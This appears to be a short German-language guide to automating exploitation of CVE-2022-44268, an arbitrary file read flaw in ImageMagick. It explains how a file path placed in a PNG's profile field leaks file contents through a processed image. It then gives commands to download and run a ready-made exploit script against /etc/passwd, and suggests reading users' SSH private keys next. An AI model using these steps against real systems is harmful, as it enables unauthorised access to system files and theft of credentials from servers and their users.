
Automatisierung der Ausnutzung von CVE-2022-44268 ImageMagick Arbitrary File Read

Automatisierung der Ausnutzung von CVE-2022-44268 – ImageMagick: Beliebiges Lesen von Dateien
Ursprüngliche Entdeckung: https://www.metabaseq.com/imagemagick-zero-days/
PoC-Repository: https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
ImageMagick interpretiert die "profile"-Textzeichenfolge** als einen Dateinamen** und lädt den Inhalt als ein Rohprofil. Danach kann der Angreifer das veränderte Bild herunterladen, das den Inhalt einer entfernten Datei enthält.
🔴 Nimm eine PNG-Datei, füge dem "profile"-EXIF-Feld einen Dateipfad hinzu, sende sie an eine Website, die eine betroffene Version von ImageMagick verwendet. ImageMagick interpretiert den Dateipfad, lädt den Inhalt der Datei in das EXIF-Feld. Du lädst das Bild herunter, extrahierst die HEX-Daten aus dem Feld "Raw Profile Type" und konvertierst sie in ASCII, um die entfernte Datei zu lesen.
Betroffene Versionen: ImageMagick 7.1.0-49
sudo apt install pngcrush imagemagick exiftool exiv2 -y
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/auto-cve-2022-44268.sh
wget https://github.com/narekkay/auto-cve-2022-44268.sh/releases/download/auto-cve-2022-44268.sh/flag.png
chmod +x auto-cve-2022-44268.sh
./auto-cve-2022-44268.sh <image name> <file to read>
./auto-cve-2022-44268.sh flag.png /etc/passwd
Sobald du Benutzer aus /etc/passwd erhalten hast, versuche, SSH-Private-Keys aus /home/.ssh// aufzulisten:
z. B. /home/john/.ssh/id_ed25519
Vergiss nicht:
imagemagick, exploit, vuln, magick convert, magick resize, exploitation, vulnerabilities, file read, CVE-2022-44268